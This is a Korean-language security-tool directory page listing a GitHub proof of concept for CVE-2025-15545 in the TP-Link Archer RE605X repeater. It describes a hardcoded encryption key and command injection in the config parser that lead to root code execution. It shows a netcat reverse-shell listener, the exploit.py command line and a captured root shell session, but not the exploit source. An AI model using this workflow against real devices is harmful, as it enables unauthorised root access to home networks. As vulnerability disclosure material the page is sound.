Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-15545 — CVE-2025-15545 개념 증명 | Kitploit
도구/GitHubGitHub/xernary/cve-2025-15545
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationReverse EngineeringCommand and Control
GitHubxernary/cve-2025-15545

CVE-2025-15545

CVE-2025-15545 개념 증명

저장소 보기
127개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2025-15545

정보

공급업체: TP-Link
공급업체 웹사이트: TP-Link
모델: Archer RE605X
하드웨어 버전: RE605X v3.0
펌웨어 버전: RE605X(EU)_V3_1.1.5 Build 20240905
펌웨어 다운로드 주소: TP-Link

하드코딩된 암호화 키 사용 및 XML 구성 파서 구성 요소의 명령 주입을 포함한 일련의 취약점으로 인해 로컬 인증 공격자가 장치에서 루트 권한으로 원격 코드 실행(RCE)을 달성할 수 있습니다.

PoC 요구사항

참고: exploit.py 개념 증명은 연결된 공격 시나리오를 보여주며, 추가 전제 조건으로 인증된 사용자의 자격 증명에 의존합니다. 이 인증 단계는 CVE-2025-15545에 포함되지 않으며 데모 목적으로만 포함됩니다.

  • 공격자와 피해자 모두 리피터의 로컬 네트워크에 연결되어 있어야 합니다.
  • 피해자는 리피터의 웹 제어판에 인증되어 있어야 합니다.

사용법

별도의 터미널에서 들어오는 연결을 수신하세요:

root@kitploit:~
$ nc -lvnp 4444

exploit.py 스크립트를 실행하세요:

root@kitploit:~
$ sudo python3 exploit.py <interface> <victim_ip> <repeater_ip> <aes_key> <aes_iv>

참고: aes_key와 aes_iv는 장치가 구성 파일 암호화 및 복호화에 사용하는 하드코딩된 암호화 키이며, 이 개념 증명에 필요합니다. 보안 문제로 인해 여기서 공유할 수 없습니다.

첫 번째 터미널에서 리버스 셸을 수신합니다:

root@kitploit:~
$ nc -lvnp 4444

Connection from 192.168.0.254:42762
# ls
cgi-bin
index-notice.html
index-url.html
index.html
webpages
# id -un
root
# uname -n
OpenWrt

참고 자료

이 취약점들은 Nicola Giuffrida가 보고했습니다.

  • 전체 분석글: https://nico-security.com/posts/cve-2025-15545
  • CVE 기록: https://www.cve.org/cverecord?id=CVE-2025-15545
  • TP-Link 권고: https://www.tp-link.com/us/support/faq/4929
도구 다운로드